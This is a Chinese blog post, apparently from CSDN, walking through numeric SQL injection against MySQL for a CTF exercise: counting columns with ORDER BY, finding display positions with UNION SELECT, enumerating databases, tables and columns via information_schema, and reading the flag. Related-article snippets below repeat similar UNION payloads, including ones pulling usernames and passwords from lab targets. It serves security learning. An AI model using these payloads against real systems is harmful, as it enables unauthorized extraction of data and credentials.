sql注入-数字型注入步骤

最新推荐文章于 2025-06-18 17:35:07 发布

CHUA731

最新推荐文章于 2025-06-18 17:35:07 发布

阅读量1.1k

点赞数 3

CC 4.0 BY-SA版权

文章标签： sql mysql

本文链接：https://blog.youkuaiyun.com/qq_73661602/article/details/131327993

文章详细介绍了如何通过SQL注入来获取数据库信息，包括确定字段数、找到显示通道，以及遍历数据库、表和列的技巧，最后展示如何读取特定数据。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

步骤：

1. 找出表中字段数：

select * from table where id=1 order by 1;

从1一直试直到报错，即可获得字段数；

2. 找通道：

因为数据库返回的字段不一定都会显示在前端中，因此我们需要找出显示的通道；

select * from table where id = -1 union select 1,2;

（如果说屏幕上有两个显示位置，那我们就给两个参数1，2 。实例参考ctfhub-sql注入-数字型注入）

确认通道后，我们按照按顺序分别找出数据库，表，列；

现在需要用到mysql自带的数据库：

[图片]

3. 找出所在数据库：

select * from table where id=-1 union select 1,database();

4. 找出表

Select * from table where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema = '数据库名';

5. 找出列：

select * from table where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = '数据库名' and table_name='表名'；

6. 拿到flag

select * from table where id=-1 union select 1,列名 from 数据库名.表名；

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

CHUA731

关注关注

3
点赞
踩
11

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作

wangyuxiang946的博客

05-13

1万+

这篇文章为大家解析布尔盲注实现原理，结合实战案例讲解布尔盲注使用步骤

SQL注入之数字型注入

PatrickStar131的博客

08-23

395

用到piakchu靶场，burp抓包进入靶场页面通过提交查询得知由变量id来输出然后进行抓包找出输入的数字进行SQL语句拼接 id=1&submit=%E6%9F%A5%E8%AF%A2 union select username,password from users id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2 拼接后进行提交，此时靶场页面显示出...

参与评论您还未登录，请先登录后发表或查看评论

sql注入--数字型

pakho_C的博客

01-01

2326

sql注入–数字型 靶场：sqli-labs-master 下载链接：靶场下载链接第二关php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connectio

SQL注入分类，一看你就明白了，（非常详细）从零基础到精通，收藏这篇就够了！

leah126的博客

06-18

1053

字符可以使用单引号包裹，也可以使用双引号包裹，根据包裹字符串的「引号」不同，字符型注入可以分为：「单引号字符型」注入和「双引号字符型」注入。这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」参数使用「单引号」包裹时，叫做单引号字符型注入，比如下面这个SQL，就是单引号字符型注入。参数使用「双引号」包裹时，叫做双引号字符型注入，比如下面这个SQL，就是双引号字符型注入。后台对应的SQL如下，字段类型是字符型，这种就是字符型注入。

SQL注入（数字型）

Vi_vids的博客

10-20

2059

基本漏洞篇 SQL注入（数字型） SQL注入就是在网站中注入sql语句，使其可以显示一些有用敏感信息本章描述的数字型即是注入点为数字，采用GET方式 //sql_num.php <?php $conn = mysql_connect('localhost:3306','root','123456')or die('bad!'); //$conn定义一个名字为conn的变量 //使用账号root密码123456 去连接localhost这个mysql服务 mysql_query("SET NAMES

SQL注入----数字型

weixin_43622525的博客

02-16

1802

目录环境实验 1、访问sqli-labs网站 2、寻找注入点 3、判断网站查询的字段数 4、判断网站的回显位置 5、获取网站当前所在数据库的库名 6、获取数据库security的全部表名 7、获取users表的全部字段名 8、获取users表id、username和password字段的全部值。环境 windows 10 phpstudy2018 ，sqli-labs靶场，Firefox浏览器插件hackbar 实验 payload又称为攻击载荷，主要是用来建立目标

SQL注入-数据类型

m0_73902453的博客

07-27

1564

许多网页链接有类似的结构 http;id=1基于此种形式的注入，一般被叫做数字型注入点，缘由是其注入点id类型为数字，在大多数的网页中，诸如查看用户个人信息，查看文章等，大都会使用这种形式的结构传递id等信息，交给后端，重询出数据库中对应的信息，返回给前台。这一类的SQL语句原型大概为select* from表名 where id=1若存在注入，我们可以构造出类似与如下的sql注入语句进行爆破: select* from表名where id=1 and 1=1。

SQL注入-基于联合查询的数字型GET注入

weixin_46831054的博客

02-16

3753

实验原理 数字型GET注入，其注入点存在于URL中的参数处。攻击者可以通过构造恶意的get输入参数，利用union select命令进行注入，暴露数据库中存储的信息。实验一步骤： 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后，根据网页，给出GET参数 ?id=1 显示出用户名：Dumb,密码：Dumb 注：该实验利用Firefox的插件：Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L

sql注入之数字型注入

08-02

检测数字型注入漏洞可以通过以下步骤： 1. 判断网站是否存在注入漏洞 2. 获取数据库名 3. 获取表名 4. 获取列名 5. 根据获取的数据库名、表名、列名来获得表内的信息四、数字型注入实例以 pikachu 靶场里的数字...

SQL注入---数值型注入（POST）

Ethan024的博客

03-22

605

SQL注入—数值型注入（POST）（本文仅供学习或参考）实验准备：皮卡丘靶场—SQL Injection—数值型注入（POST）实验步骤：先查询一下下拉框的功能：查看此时的URL：http://localhost/pikaqiu.cn/vul/sqli/sqli_id.php发现是post方式提交的请求，因为没有使用URL传参。后端数据库查询逻辑：select name, email from table where id = n(1,2,3,4…) 使用Burpsuite

第四节基于报错的SQL注入-01

09-15

数字型SQL注入是指在SQL语句中使用数字值作为输入参数，例如：`select * from table where id = 用户输入id`。字符型SQL注入是指在SQL语句中使用字符串值作为输入参数，例如：`select * from table where id = '用户...

***学习笔记--基础篇--sql注入（数字型）

weixin_34364071的博客

09-28

663

环境：dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点（1）知识点回顾如果上一篇有好好读过的同学应该知道，我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话，则我们必须先闭合前面的单引号或者双引号，否则我们的数据始终会被...

SQL数字型注入

gl620321的博客

08-10

462

一、SQL注入问题的审计 SQL攻击（SQL injection），简称注入攻击，是发生于应用程序之数据库层的安全漏洞。简而言之，是在输入的字符串之中注入SQL指令，在设计不良的程序中忽略了检查，那么这些注入进去的指令就会被数据库服务器认为是正常的SQL指令而运行，因此遭到破坏。而数字型注入一般不用考虑到引号的问题了这个函数的功能就是将我们输入的字符进行查找替换转化第6行任意注入...

SQL注入（一）：数字型（手注）+利用+爆破

NSQ0207的博客

07-19

1544

查询语句：select id,email from member where username=$id

sql注入（整数型注入）

2401_82760239的博客

03-29

1446

SQL注入是一种非常常见的数据库攻击手段，SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说，就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是，SQL数据库的操作是通过SQL语句来执行的，而无论是执行代码还是数据项都必须写在SQL语句之中，这就导致如果我们在数据项中加入了某些SQL语句关键字（比如说SELECT、DROP等等），这些关键字就很可能在数据库写入或读取数据时得到执行。

SQL注入学习教程（二）

wuqingCL的博客

11-05

242

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种： (A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：Select * from 表名 where 字段=49注入的参数为ID=49 And [查询条件]，即是生成语句：Select * from 表名 where 字段=49 A...

SQL注入原理-数值型注入

你们de4月天的博客

09-12

1834

SQL注入原理-数值型注入

数字型 sql注入

forwardss的博客

03-05

572

数字型： select * from table where id=8 字符型： select * from table where username=‘admin’ sql注入语句： select * from table where username=‘yiz and 1=1’ ‘yiz and 1=1’ 当作字符查询了。 select * from table where username=...

SQL注入基础--数字型注入